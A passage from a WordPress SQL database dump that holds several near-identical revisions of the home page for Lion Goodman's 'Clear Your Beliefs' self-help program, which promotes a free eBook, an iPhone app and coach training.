Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 01:43:34', '2014-11-14 06:43:34', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1745, 2, '2014-11-14 01:40:18', '2014-11-14 06:40:18', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\n<p>Free eBook</p><img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" /><p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p><p></p>FIRST NAME * EMAIL * <p> </p>Free App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 01:40:18', '2014-11-14 06:40:18', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1747, 2, '2014-11-14 01:48:31', '2014-11-14 06:48:31', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 01:48:31', '2014-11-14 06:48:31', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1748, 2, '2014-11-14 01:58:25', '2014-11-14 06:58:25', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center;padding-top: 10px;margin: 0px"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 01:58:25', '2014-11-14 06:58:25', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1749, 2, '2014-11-14 02:04:18', '2014-11-14 07:04:18', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center; margin-top: 30px;"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center; font-size: 14px; margin-bottom: -2px;">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:04:18', '2014-11-14 07:04:18', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1751, 2, '2014-11-14 02:18:13', '2014-11-14 07:18:13', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nComplete Program\n<img src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center;margin-top: 18px;font-size: 16px"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:18:13', '2014-11-14 07:18:13', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0),
(1750, 2, '2014-11-14 02:12:13', '2014-11-14 07:12:13', '<img class="img-responsive"  src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/headb.jpg" alt="header" />\n\nFree eBook\n\n<img class="wp-image-1476 aligncenter" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/ebook2-202x300.png" alt="ebook" width="71" height="106" />\n<p style="text-align: center; padding-top: 10px; margin: 0px;"><strong>Download the free eBook.</strong></p>\n\nFIRST NAME *\n\nEMAIL *\n\nFree App\n\n<img class="aligncenter size-full wp-image-1482" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/iClear-200x201-app-box.jpg" alt="download" width="89" height="87" />\n<p style="text-align: center;margin-top: 30px"><strong>DOWNLOAD the FREE APP</strong></p>\n<p style="text-align: center;font-size: 14px;margin-bottom: -2px">Start Clearing Whatever Is In The Way Right Now!</p>\n\nDOWNLOAD iPHONE APP\n\nComplete Program<img style="top:-10px !important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/IClearIt-website_sml-300x134.png">\n<p style="text-align: center; margin-top: 18px; font-size: 16px;"><strong>Clear Your Limiting and Negative Beliefs – Permanently!</strong></p>\n\n<h2>The <em>Clear Your Beliefs</em> Program empowers you to...</h2>\n\nRelease pain and hurts from the past\nOpen to deeper, more profound love\nRecognize your true spiritual nature\nBecome more calm and less reactive\nRediscover the source of your personal power\n\nClear whatever stops you from taking action\nOpen yourself to new possibilities of success\nEliminate blocks and barriers easily\nDiscover your true purpose\nExpress your true magnificence\n\n<h2>How and Why It Works So Well</h2>\n\nBeliefs are the major cause of unhappiness, upsets, and limitations.\nThe <em>Clear Your Beliefs Program</em> eliminates beliefs at the core of the psyche.\nThe process utilizes all three levels of the mind: Subconscious, Conscious, and Superconscious.\nYou''re in charge – you decide what you want to believe, and how far you want to go.\nThe program guides you, gently, step-by-step, through the entire process of deleting beliefs.\nUnlike other methods, the changes you make are permanent – your old beliefs don''t come back.\n\n<h2><img class="alignleft size-full wp-image-1471" style="margin-right: 15px ! important; margin-top: 5px ! important;" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/pic.png" alt="pic" width="157" height="196" />A Note from Lion Goodman</h2>\n<p style="font-size: 1.1em;"><strong>Creator of the <em>Clear Your Beliefs</em> program.</strong></p>\nI’ve been a consciousness explorer for more than 40 years. During those decades, I searched for tools that would open my mind, heal my past, and make me more successful. I experimented with dozens of methods of psychological growth, spiritual practice, and esoteric disciplines. At the same time, I was also a businessman and entrepreneur. I built a million-dollar consulting firm working with senior executives and Fortune 1000 companies.\n\nAll of this experience has culminated in the programs I offer here. Throughout my journey, I discovered the power of beliefs. Because beliefs actually create our experience, we can change our experience by changing our beliefs. This includes the beliefs we hold about ourselves, about others, and about the world. Beliefs are not "right or wrong," "good or bad," or "true or false." They''re simply tools we use to shape our reality.\n\nSo the important questions are:\n\n <em>What do I want to experience?</em>\n<em>What belief is creating this experience I don''t want?</em>\n<em>How can I change my belief so I can change my experience?</em>\n\n<strong>This is the most effective belief-change method that we know of.</strong>  Clients and students call it <em>“A Magic Wand for changing your life.”</em>\n\nI''m happy that you''ve found your way here. Now, take action. Begin this exciting adventure by reading my free eBook. If you have an iPhone or iPad, download <em>iClearIt</em>\n\nIf you want to really clean out your subconscious beliefs, register for the <em>Clear Your Beliefs </em>program.  I’ll guide you, step by step, through the process of examining what''s interfering with your life, finding the belief or beliefs at the core, then eliminating them, one by one. You’ll feel better. You''ll function better. Life simply gets easier. The resistance and blocks that have held you back just melt away ­­– like magic. And if you want to make your journey even more effective, add personalized coaching from one of our professional <em>Clear Your Beliefs Coaches</em>.\n\n<strong>Did I mention that it’s easy? And also a lot of fun?</strong>\n\nI look forward to hearing your feedback.  I’m always available to you to support your journey.\n\nWarmly,\n\n<img class="size-full wp-image-1468 alignnone" src="http://clearyourbeliefs.com/wp-content/uploads/2014/10/lion.jpg" alt="lion" width="286" height="89" />\n\n<h3 style="text-align: center;">Are you a Coach?  Therapist?  Healer?  Change Agent?</h3><p style="text-align: center;">Learn the <em>Clear Your Beliefs</em>  process through our 10-week training program.  Help your clients clear their beliefs so they can move their lives forward more easily and effortlessly.</p><p style="text-align: center;"><a href="http://clearbeliefs.com/" class="su-button su-button-style-default" style="color:#FFFFFF;background-color:#253aa4;border-color:#1e2e83;border-radius:11px;-moz-border-radius:11px;-webkit-border-radius:11px" target="_self"> Learn About the Practitioner Training</a></p>© Copyright 2014 by Lion Goodman', 'CYB Home', '', 'inherit', 'closed', 'open', '', '1450-revision-v1', '', '', '2014-11-14 02:12:13', '2014-11-14 07:12:13', '', 1450, 'http://clearyourbeliefs.com/1450-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
